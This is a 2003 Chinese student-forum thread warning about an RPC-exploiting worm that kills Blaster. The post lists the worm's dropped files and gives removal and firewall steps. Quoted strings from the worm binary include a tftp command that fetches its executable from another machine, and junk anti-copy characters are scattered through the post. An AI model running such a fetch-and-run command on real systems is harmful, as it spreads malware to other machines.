下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2806|回复: 7
打印 上一主题 下一主题

[转帖]最新RPC漏洞病毒.关于最近的疯狂ping

[复制链接]

该用户从未签到

跳转到指定楼层
1
发表于 2003-8-30 22:50:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
该病毒的特点是将“冲击波”(Worm.Blaster)病% [+ W$ K+ N5 e1 K
' a' b- ]! h8 h/ g3 j6 c3 j
毒干掉,并在系统内值入,预防冲击波病毒的疫苗。$ G4 Y9 H( ]6 d' X# q8 d4 z
4 y8 i$ r1 t* r6 X- k: |6 R9 a
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然' d7 S5 r- K, f$ e$ j
: n+ u. F# w" ]; L- u. y/ y
后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,
8 W' }! ]1 D  e8 ~5 ?  ]  G8 F( G
1 w6 A" d' q# r. i7 F+ N消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意- d7 P- o/ w+ y  Y

9 c0 J- S1 L# X+ {1 p, G6 {作恶,病毒设定在2004年自行毁灭。
6 Z% ?* S: D7 M8 ]( A0 M, V$ w
* |/ i0 M9 ]- h. y由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此广大用户,' `  b' n" R5 K/ q6 \
% v) Y5 T5 v/ ]" e4 M
设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。$ i% ?! V6 T. v8 B) p' A5 F

' W- ?  r- P) i0 ?& {4 j3 R5 t. [5 L7 F) a* c, f  u) |2 u
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒
; v: S4 X9 {2 n$ Z4 [; a; D! @/ i3 n# z! H* g3 v! t
SVCHOST.EXE 大小是19.2K6 }# G1 \: b- X8 |: |! w
DLLHOST.EXE 大小是10.K. n/ X; j- D8 R. e8 k/ [1 ~, k

9 f# s+ F, q0 ^" tDLLHOST.EXE里面有这样的话!3 A$ _0 [( k! b# U
/ H6 w# b8 R/ Y$ V4 B& s1 g: y1 c/ s

9 w5 Q: p3 D/ @! t* b引用:
' ~, b( }9 S( ^0 i# [- V6 P; k
: z% v5 U1 W/ e' Z& j! Z$ b2 O=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE$ n* q( k  N) s7 e+ @# J

' T8 T# ~- h3 `- `/ A这2个文件在在:%Windir%\system32\wins\目录里..(注意:不是:%Windir%\system32\..)
9 c' K) h. [1 o: m  d3 H* c* {, L4 j- Z
  A$ ^2 e: S0 G/ l$ @" `) l+ Y. q: a" }  `8 c
紧急解决方案:
6 a) t5 r( }+ N1 _6 O. Y) {: q停止一下两个服务:6 B/ a1 i' o- ~* M  c
0 x) x7 q" T& c5 [
Network connections Sharing- I7 r6 ^. k* r# ^( i
WINS Client, r4 T# q6 m" f7 u, s

* W- a  Z4 M6 Q在:%Windir%\system32\wins\
7 q3 n& V, n: r* H/ j目录下删除:, D/ a6 U3 Q: q) r+ ?

' ]2 ?; Q1 M$ c" sSVCHOST.EXE  u6 I) J/ h( ~/ |$ D
DLLHOST.EXE ' N9 K& _  ?1 r8 G
% y* V1 [0 \" U1 R8 P1 D* f8 F' ^* P
这两个文件,安装防火墙,并禁止PING。
/ N0 o0 U, r  P. }
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩

该用户从未签到

2
发表于 2003-8-31 12:08:00 | 只看该作者
防火墙跳个不停

该用户从未签到

3
发表于 2003-9-7 08:59:00 | 只看该作者
请问,要是我要共享,又要不受这病毒,那该怎么办,因为我们是共享上网的
带你去看海 该用户已被删除
4
发表于 2003-9-7 09:34:00 | 只看该作者
有点麻烦。。。。。。。。
sai 该用户已被删除
5
发表于 2003-9-7 10:03:00 | 只看该作者
把日期改到2004年以后呀

该用户从未签到

6
发表于 2003-9-7 12:35:00 | 只看该作者
唉,没用的,我改到了2005,还是这样 ,要卡的,CPU利用率到快一百了,,我不共享马上就好了,有没有别的办法啊

该用户从未签到

7
 楼主| 发表于 2003-9-7 15:18:00 | 只看该作者
看来还是取消网络共乡有效啊~~
  • TA的每日心情
    奋斗
    昨天 11:26
  • 签到天数: 2397 天

    [LV.Master]伴坛终老

    8
    发表于 2003-9-7 21:31:00 | 只看该作者
    删除染毒文件,安装补丁,然后安装天网防火墙,这样就不会再次感染

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表